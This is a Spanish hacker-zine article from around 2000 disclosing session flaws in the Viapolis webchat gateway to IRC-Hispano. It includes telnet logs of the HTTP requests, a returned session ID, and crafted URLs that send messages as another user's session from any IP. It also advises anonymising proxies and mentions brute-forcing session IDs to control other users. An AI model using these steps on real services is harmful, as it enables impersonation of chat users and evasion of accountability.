mi030

Vulnerabilidad Viapolis.com
///IRC Gateway - Versión 2.0 Copyright (c) 2000 Lleida Networks Serveis Telemàtics,S.L. \\\

Cuando un usuario accede al Irc-Hispano empleando Viapolis.com, el usuario aparece con IP
origen chat.viapolis.com, siendo más intimo que emplear la conexión directa al irc.

Los bugs de seguridad de viapolis son:

* Cada vez que uno conecta al HISPANO mediante Viapolis.com nos asigna un IDENT diferente, siendo imposible banear una conexión. Si alguien banea a alguien banea a todos los usuarios de Viapolis.com.

* Tabla de sesiones incorrecta: Uno puede conectar al IRC mediante viapolis.com y luego tener una comunicación anónima mediante un proxy! La razón del problema estriba en que una sesión determinada no va asociada a una IP.

* Suplantación de personalidad de usuarios: Se podría hablar por ellos, controlarlos si conectan desde viapolis.com. Actualmente en el Irc-hispano se oculta la IP origen (salvo para ircops) pero es importante destacar que en el campo nombre, si usan viapolis pone "http://www.viapolis.com" con lo que su detección no es complicada.

Veamos los detalles de estos problemas viendo el protocolo de comunicación empleado por Viapolis.
(programado por Lleida Networks S.L)

Conexión - acceso al IRC:

se emplea un formulario que apunta a un CGI con método GET. Por si alguno no conoce este protocolo del HTTP, indicare que en este protocolo se llama al script pasando luego un "?" seguido de los campos y sus respectivos valores separado de un "&".

En este caso: supondremos canal #coruña, nick "tio90" ¿ok?

Hacemos una conexión TCP mediante SOCK_STREAM y pegamos el trozo de código...
GET ... HTTP/1.1
Accept: */*
Accept-Language: es Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: chat.viapolis.com
Referer: http://chat.viapolis.com/canal.html?can=Coruña
Connection: Conection-closed

(no olvidéis 2 retornos de carro)

Veamos un ejemplo:

Script started on Sat Dec 9 20:01:01 2000 adminr@router:~$ telnet chat.viapolis.com 80 Trying 194.149.72.51... Connected to chat.viapolis.com. Escape character is '^]'. GET /lci/lciviapolis.pike?create=1&randn=via&mode=NORMAL&tstamp=FALSE&ultextc=000000&ulbgc=FFFFFF&ulbackg=&ulfont=%3CFONT+FACE%3D%27Verdana%2CArial%2CHelvetica%27+SIZE%3D%272%27%3E&ulimg=FALSE&hlinkc=0000FF&hbgc=FFFFFF&hbackg=&htextc=000000&hfont=%3CFONT+FACE%3D%27Verdana%2CArial%2CHelvetica%27+SIZE%3D%272%27%3E&himg=FALSE&cfbgc=FFAF0F&cftextc=000000&cfsptextc=990000&chtitlec=FFAF0F&chdarkc=FBDB90&chlightc=FFFFFF&chtextc=000000&chbgc=FFFFFF&chbackg=&maxcan=49&maxpriv=30&button=FALSE&titlebgc=1864A4&bannerbgc=FFFFFF&canal=%23coru%F1a&nick=tio90&password=&enviar=Conectar HTTP/1.1 Accept: */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Host: chat.viapolis.com Referer: http://chat.viapolis.com/canal.html?can=coruqa Connection: Conection-closed HTTP/1.1 200 OK Accept-Ranges: bytes MIME-Version: 1.0 Date: Sat, 09 Dec 2000 17:18:36 GMT Server: Roxen·Challenger/1.3.122 Content-type: text/html Connection: close Content-length: 3921 <HTML> <HEAD> <TITLE>Viapolis WebChat 2.0</TITLE> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="5"> </HEAD> <FRAMESET ROWS='48,68,29,29,*,6,27' frameborder=0 framespacing=0 border=no> <FRAME NAME="irc_titol" SRC="titol.html?bannerbgc=%23FFFFFF&bgc=%231864A4" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="irc_banner" SRC="banner.html?bgc=FFFFFF" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAMESET COLS='*,150,7' frameborder=0 framespacing=0 border=no> <FRAME NAME="irc_users" SRC='relleno.html?bgc=%23FFAF0F&backg=' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="irc_canals" SRC='canals.html?bgc=%23FFAF0F' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="relleno1" SRC="relleno.html?bgc=%23FFAF0F&backg=" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> </FRAMESET> <FRAME NAME="irc_topic" SRC='topic.html?bgc=%23FFAF0F&textc=%23000000' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAMESET COLS='7,*,7,118,7' frameborder=0 framespacing=0 border=no> <FRAMESET ROWS='0,0,*' frameborder=0 framespacing=0 border=no> <FRAME NAME="irc_ping" SRC="relleno.html?bgc=%23FFAF0F&backg=" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="irc_stream" SRC="/lci/lciviapolis.pike?session_id=C50D460014299AD2&nick=tio90&password=&channel=%23coruña&user=&randn=via&mode=NORMAL&tstamp=FALSE&himg=FALSE&ultextc=000000&ulbgc=FFFFFF&ulbackg=&ulimg=FALSE&ulfont=<FONT%20FACE%3D%27Verdana,Arial,Helvetica%27%20SIZE%3D%272%27>&hlinkc=0000FF&hbgc=FFFFFF&hbackg=&htextc=000000&hfont=<FONT%20FACE%3D%27Verdana,Arial,Helvetica%27%20SIZE%3D%272%27>&cfbgc=FFAF0F&cftextc=000000&cfsptextc=990000&chtitlec=FFAF0F&chdarkc=FBDB90&chlightc=FFFFFF&chtextc=000000&chbgc=FFFFFF&chbackg=&maxcan=49&maxpriv=30&button=FALSE&titlebgc=1864A4&bannerbgc=FFFFFF&frame=stream" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="relleno2" SRC="relleno.html?bgc=%23FFAF0F&backg=" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> </FRAMESET> <FRAME NAME="irc_history" SRC='conectant.html?bgc=%23FFFFFF&backg=' marginwidth=0 marginheight=0 scrolling=auto frameborder=no border=0> <FRAME NAME="relleno3" SRC="relleno.html?bgc=%23FFAF0F&backg=" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAMESET ROWS='*,5,22' frameborder=0 framespacing=0 border=no> <FRAME NAME="irc_userlist" SRC='relleno.html?bgc=%23FFFFFF&backg=' marginwidth=0 marginheight=0 scrolling=auto frameborder=no border=0> <FRAME NAME="relleno4" SRC="relleno.html?bgc=%23FFAF0F&backg=" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="irc_actions" SRC='actions.html?bgc=%23FFAF0F&button=FALSE' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> </FRAMESET> <FRAME NAME="relleno5" SRC='relleno.html?bgc=%23FFAF0F&backg=' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> </FRAMESET> <FRAME NAME="relleno6" SRC="relleno.html?bgc=%23FFAF0F&backg=" marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAMESET COLS='102,*' frameborder=0 framespacing=0 border=no> <FRAME NAME="irc_nick" SRC='relleno.html?bgc=%23FFAF0F&backg=' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> <FRAME NAME="irc_entrada" SRC='relleno.html?bgc=%23FFAF0F&backg=' marginwidth=0 marginheight=0 scrolling=no frameborder=no border=0> </FRAMESET> </FRAMESET> <NOFRAMES> <H1>Error NOFRAMES</H1> Es necesario que su navegador disponga de "FRAMES" para ejecutar esta aplicación.<br>Actualize su programa. </NOFRAMES> </HTML> Connection closed by foreign host. adminr@router:~$ exit Script done on Sat Dec 9 20:01:59 2000

Buscamos el SESSION-ID, en este caso: session_id=C50D460014299AD2
Se trata de 16 caracteres de identificación de sesión. Aun no estamos conectados. Este código
html únicamente crea la ventana.

Ahora hacemos realmente accesible el Nick con este código. Aquí tenéis el Log. Fijaros que
usamos el sesion_id devuelto: (la siguiente conexión no debe cerrarse o el nick dejara de existir.)
En esta conexión tenemos un LOG de todo lo que pasa en el canal, respuestas, cambios de nick, etc

Script started on Sat Dec 9 20:41:19 2000 adminr@router:~$ telnet chat.viapolis.com 80 Trying 194.149.72.51... Connected to chat.viapolis.com. Escape character is '^]'. GET /lci/lciviapolis.pike?session_id=C50D460014299AD2&nick=tio23&password=&channel=%23coru%F1o&user=&randn=via&mode=NORMAL&tstamp=FALSE&himg=FALSE&ultextc=000000&ulbgc=FFFFFF&ulbackg=&ulimg=FALSE&ulfont=<FONT%20FACE%3D%27Verdana,Arial,Helvetica%27%20SIZE%3D%272%27>&hlinkc=0000FF&hbgc=FFFFFF&hbackg=&htextc=000000&hfont=<FONT%20FACE%3D%27Verdana,Arial,Helvetica%27%20SIZE%3D%272%27>&cfbgc=FFAF0F&cftextc=000000&cfsptextc=990000&chtitlec=FFAF0F&chdarkc=FBDB90&chlightc=FFFFFF&chtextc=000000&chbgc=FFFFFF&chbackg=&maxcan=49&maxpriv=30&button=FALSE&titlebgc=1864A4&bannerbgc=FFFFFF&frame=stream HTTP/1.1 Accept: */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) Host: chat.viapolis.com Referer: http://chat.viapolis.com/lci/lciviapolis.pike?create=1&randn=via&mode=NORMAL&tstamp=FALSE&ultextc=000000&ulbgc=FFFFFF&ulbackg=&ulfont=%3CFONT+FACE%3D%27Verdana%2CArial%2CHelvetica%27+SIZE%3D%272%27%3E&ulimg=FALSE&hlinkc=0000FF&hbgc=FFFFFF&hbackg=&htextc=000000&hfont=%3CFONT+FACE%3D%27Verdana%2CArial%2CHelvetica%27+SIZE%3D%272%27%3E&himg=FALSE&cfbgc=FFAF0F&cftextc=000000&cfsptextc=990000&chtitlec=FFAF0F&chdarkc=FBDB90&chlightc=FFFFFF&chtextc=000000&chbgc=FFFFFF&chbackg=&maxcan=49&maxpriv=30&button=FALSE&titlebgc=1864A4&bannerbgc=FFFFFF&canal=%23coru%F1a&nick=tio23&password=&enviar=Conectar Connection: Conection-closed HTTP/1.0 200 Ok Pragma: no-cache Expires: 1 Content-type: text/html <html> <head> <title>iRC-Hispano WebChat</title> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="5"> <script>  </script> </head> <body bgcolor="#FFAF0F" onUnload="javascript:CloseAll();">  <script>IniFrames("Ini();");</script> <SCRIPT>E("6-ananke.irc-hispano.org- *** Proxy test passed (CACHED! - TTL: 6059 seconds).");</SCRIPT>  <SCRIPT>E("12Bienvenido a 4iRC-Hispano12, tio23");</SCRIPT> <SCRIPT>E("12Conectando por el servidor ananke.irc-hispano.org");</SCRIPT> <SCRIPT>E("12 This server was created lun dic 4 2000 at 11:16:21 CET");</SCRIPT> <SCRIPT>E("12ananke.irc-hispano.org u2.10.H.02.05 dioswkg biklmnopstv This server was created lun dic 4 2000 at 11:16:21 CET");</SCRIPT> <SCRIPT>E("12 There are 12372 users and 4742 invisible on 46 servers");</SCRIPT> <SCRIPT>E("4* Tenemos 24 Operadores conectados.");</SCRIPT> <SCRIPT>E("4* Tenemos 7718 Canales creados.");</SCRIPT> <SCRIPT>E(" I have 135 clients and 1 servers");</SCRIPT> <SCRIPT>E("6-ananke.irc-hispano.org- Highest connection count: 185 (184 clients)");</SCRIPT> <SCRIPT>E("3** Mensaje del Dia (/MOTD)");</SCRIPT> <SCRIPT>E("3 - 4/12/2000 11:17");</SCRIPT> <SCRIPT>E("3 - Servidor de IRC de Viapolis");</SCRIPT> <SCRIPT>E("3 - Ananke Nodo adscrito a IRC-Hispano");</SCRIPT> <SCRIPT>E("3 - http://chat.viapolis.com");</SCRIPT> <SCRIPT>E("3** Fin del /MOTD **");</SCRIPT> <SCRIPT>E("6-ananke.irc-hispano.org- on 46 ca 1(2) ft 8(10) tr");</SCRIPT> <SCRIPT>E("3*** tio23 cambia modos: tio23 +x");</SCRIPT> <SCRIPT>E("3*** tio23 ha entrado en #coruño");</SCRIPT> <SCRIPT>Nick('tio23',2);</SCRIPT><SCRIPT>ForceUL();</SCRIPT> <SCRIPT>Nick('tio23',0);</SCRIPT> <SCRIPT>UL();</SCRIPT>

A partir de ahora podemos conectar desde otra IP, cada vez que queramos cambiar de canal, mandar mensajes al canal, hacer whois, etc. Usando el siguiente código:

MANDAR ALGO AL CANAL http://chat.viapolis.com/lci/lciviapolis.pike?session_id=63458915E625E3CC&frame=entrada&bgc=#FFAF0F&texto=hola HACER UN PRIVADO a Juan23 /lci/lciviapolis.pike?session_id=63458915E625E3CC&frame=entrada&bgc=#FFAF0F&texto=%2Fmsg+Juan23+holas+tete OTROS COMANDOS cambiar msg por whois CAMBIAR DE CANAL es lo mismo pero en vez de msg, join+#canal

Todas las operaciones anteriores podrían hacerse desde IP's diferentes a las de establecimiento de conexión. Vosotros ya podéis deducir los defectos de seguridad. Primero iría con Anonymizer.com,
pondríais utilizar anonymizer con el trozo de http anterior y así hablar de manera segura. La ip de conexión
origen debe ser anónima. O bien una shell etc.

Por otro lado se destaca que sabiendo el session-id (u obteniendolo intentando averiguar protocolo o por ataque bruto) se podría controlar a cualquier usuario que use viapolis.com ya que la IP de origen no es comprobada.

En fin, espero que os haya interesado el articulo.

Saludos, R.M.G.

En este articulo de R.M.G. se demuestra aparte de como entrar anónimamente, como nuestras conversaciones en el Irc-hispano pueden ser perfectamente manipuladas, ademas fácilmente se puede acceder con ip's ajenas por lo que ninguna conversación debería ser objeto de investigación por parte de las fuerzas de seguridad del estado, ya que ante un juez no son demostrables.

(C) 1997-2001 by !Hispahack
Para ver el web en las mejores condiciones, usa una resolución de 800x600 y Netscape Navigator